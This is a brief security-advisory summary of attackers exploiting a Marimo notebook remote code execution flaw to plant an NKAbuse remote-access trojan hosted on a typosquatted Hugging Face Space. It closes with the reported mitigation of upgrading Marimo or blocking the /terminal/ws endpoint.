Attackers are exploiting a critical remote code execution flaw in the Marimo reactive Python notebook (CVE-2026-39987) to deploy a new variant of NKAbuse hosted on Hugging Face Spaces. Sysdig observed rapid post-disclosure exploitation that delivered a dropper and a kagent binary for persistence and remote access, and recommends upgrading to Marimo 0.23.0 or blocking the /terminal/ws endpoint if upgrading is not possible. #NKAbuse #Marimo
Keypoints
- A Marimo RCE (CVE-2026-39987) is being actively exploited to execute attacker-supplied code.
- Attackers created a typosquatted Hugging Face Space (vsccode-modetx) hosting a dropper script and a kagent binary.
- The payload is a previously undocumented NKAbuse variant acting as a remote access trojan that runs shell commands and returns output.
- Persistence is established via systemd, cron, or macOS LaunchAgent, and abuse of Hugging Face Spacesβ trusted HTTPS reduces detection likelihood.
- Sysdig advises immediate upgrade to Marimo 0.23.0 or blocking external access to the /terminal/ws endpoint to mitigate attacks.